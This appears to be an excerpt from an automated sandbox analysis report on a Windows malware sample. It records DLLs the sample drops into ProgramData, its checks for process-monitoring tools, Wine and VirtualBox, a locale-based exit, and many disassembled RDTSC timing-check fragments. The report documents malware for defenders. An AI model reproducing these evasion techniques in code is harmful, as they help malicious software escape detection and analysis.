Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00339860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 581AB0 second address: 581ACD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F36EC8543C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d jne 00007F36EC8543CCh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FBBC4 second address: 6FBBCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FBBCA second address: 6FBBCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6EFF03 second address: 6EFF09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6EFF09 second address: 6EFF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F36EC8543C6h 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F36EC8543C6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6EFF25 second address: 6EFF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6EFF29 second address: 6EFF2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FAF04 second address: 6FAF08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FAF08 second address: 6FAF14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FAF14 second address: 6FAF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FB1CD second address: 6FB1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FB1D2 second address: 6FB1D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FB1D8 second address: 6FB1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FB1DC second address: 6FB1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F36ED361E12h 0x0000000e jno 00007F36ED361E06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FB30F second address: 6FB315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF125 second address: 6FF134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF134 second address: 6FF138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF138 second address: 6FF13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF200 second address: 6FF205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF205 second address: 6FF239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F36ED361E0Ch 0x0000000f nop 0x00000010 pushad 0x00000011 mov edi, dword ptr [ebp+122D28E1h] 0x00000017 mov eax, ebx 0x00000019 popad 0x0000001a push 00000000h 0x0000001c mov edi, edx 0x0000001e push 673B5B0Ch 0x00000023 pushad 0x00000024 pushad 0x00000025 jl 00007F36ED361E06h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF239 second address: 6FF2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F36EC8543D7h 0x0000000a popad 0x0000000b xor dword ptr [esp], 673B5B8Ch 0x00000012 mov dword ptr [ebp+122D2CEAh], ebx 0x00000018 push 00000003h 0x0000001a jc 00007F36EC8543CCh 0x00000020 sub edi, dword ptr [ebp+122D2EBAh] 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F36EC8543C8h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 jmp 00007F36EC8543D0h 0x00000047 push 00000003h 0x00000049 mov dword ptr [ebp+122D1A53h], eax 0x0000004f cmc 0x00000050 push 4AFA01CEh 0x00000055 push eax 0x00000056 push edx 0x00000057 jp 00007F36EC8543CCh 0x0000005d js 00007F36EC8543C6h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF36D second address: 6FF377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F36ED361E06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF377 second address: 6FF42E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d jmp 00007F36EC8543D7h 0x00000012 pop esi 0x00000013 nop 0x00000014 mov si, A250h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F36EC8543D6h 0x00000020 mov dword ptr [ebp+122D17F4h], edx 0x00000026 pop edx 0x00000027 pop esi 0x00000028 push 1E6A8A21h 0x0000002d jo 00007F36EC8543CCh 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 xor dword ptr [esp], 1E6A8AA1h 0x00000040 mov esi, dword ptr [ebp+122D2C87h] 0x00000046 mov dword ptr [ebp+122D30C3h], eax 0x0000004c push 00000003h 0x0000004e mov dword ptr [ebp+122DB684h], edx 0x00000054 push 00000000h 0x00000056 xor dword ptr [ebp+122D1A4Eh], ebx 0x0000005c push 00000003h 0x0000005e mov dx, D3BAh 0x00000062 call 00007F36EC8543C9h 0x00000067 pushad 0x00000068 jne 00007F36EC8543C8h 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F36EC8543CBh 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF42E second address: 6FF47B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 ja 00007F36ED361E1Dh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jnl 00007F36ED361E1Ch 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF47B second address: 6FF48F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF48F second address: 6FF4C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F36ED361E0Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F36ED361E11h 0x00000018 jg 00007F36ED361E06h 0x0000001e popad 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF4C3 second address: 6FF4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pop eax 0x00000007 xor ecx, 1CE080AEh 0x0000000d lea ebx, dword ptr [ebp+12450F21h] 0x00000013 clc 0x00000014 xchg eax, ebx 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F36EC8543D3h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF4EE second address: 6FF4F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71E61B second address: 71E61F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71C689 second address: 71C6A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36ED361E16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71C6A4 second address: 71C6BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F36EC8543CCh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71C6BC second address: 71C6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F36ED361E06h 0x0000000a pop esi 0x0000000b push ebx 0x0000000c jnc 00007F36ED361E06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71C6D0 second address: 71C6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71C810 second address: 71C828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F36ED361E0Bh 0x0000000a js 00007F36ED361E12h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71CC5D second address: 71CC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71CC76 second address: 71CC84 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F36ED361E06h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71CF88 second address: 71CF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71D23F second address: 71D245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7125D0 second address: 7125F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F36EC8543C6h 0x00000010 jmp 00007F36EC8543CDh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7125F7 second address: 7125FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7125FC second address: 712602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71E1AC second address: 71E1B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71E1B2 second address: 71E1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e ja 00007F36EC8543F6h 0x00000014 jmp 00007F36EC8543D9h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F36EC8543CFh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 722EB4 second address: 722EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72ADBE second address: 72ADEC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F36EC8543D9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F36EC8543C8h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72ADEC second address: 72ADF4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72ADF4 second address: 72ADF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72A33E second address: 72A353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F36ED361E0Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72A952 second address: 72A96A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F36EC8543C8h 0x0000000e jns 00007F36EC8543CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72A96A second address: 72A96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72AC45 second address: 72AC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72AC4E second address: 72AC54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72AC54 second address: 72AC5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72AC5A second address: 72AC5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72C483 second address: 72C491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543CAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F687 second address: 72F68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F68B second address: 72F695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72F71E second address: 72F722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72FC06 second address: 72FC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F36EC8543C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72FCFD second address: 72FD01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72FD83 second address: 72FD87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72FD87 second address: 72FD8D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7304D4 second address: 7304D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7305BF second address: 7305CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7305CA second address: 7305D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7305D0 second address: 7305D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7305D5 second address: 7305DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73082B second address: 730839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F36ED361E0Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 731597 second address: 73159D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 731E68 second address: 731E6E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73159D second address: 7315A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 731E6E second address: 731E73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73329F second address: 7332FE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F36EC8543C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F36EC8543CEh 0x00000012 jmp 00007F36EC8543CDh 0x00000017 popad 0x00000018 pop eax 0x00000019 nop 0x0000001a sub si, 4185h 0x0000001f push 00000000h 0x00000021 mov edi, edx 0x00000023 push 00000000h 0x00000025 movzx esi, dx 0x00000028 xchg eax, ebx 0x00000029 jmp 00007F36EC8543D4h 0x0000002e push eax 0x0000002f jnp 00007F36EC8543D4h 0x00000035 push eax 0x00000036 push edx 0x00000037 ja 00007F36EC8543C6h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 734956 second address: 7349C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 nop 0x00000007 mov edi, dword ptr [ebp+122D2047h] 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F36ED361E08h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F36ED361E08h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D2310h] 0x0000004b xchg eax, ebx 0x0000004c jmp 00007F36ED361E13h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 pop edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7349C7 second address: 7349CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7351C0 second address: 7351C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7369FA second address: 736A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543CFh 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, edx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F36EC8543C8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b sub dword ptr [ebp+122D2EC3h], ecx 0x00000031 push 00000000h 0x00000033 mov dword ptr [ebp+12479BD4h], eax 0x00000039 push eax 0x0000003a pushad 0x0000003b pushad 0x0000003c jmp 00007F36EC8543CFh 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7351C6 second address: 7351CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7374D8 second address: 7374DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
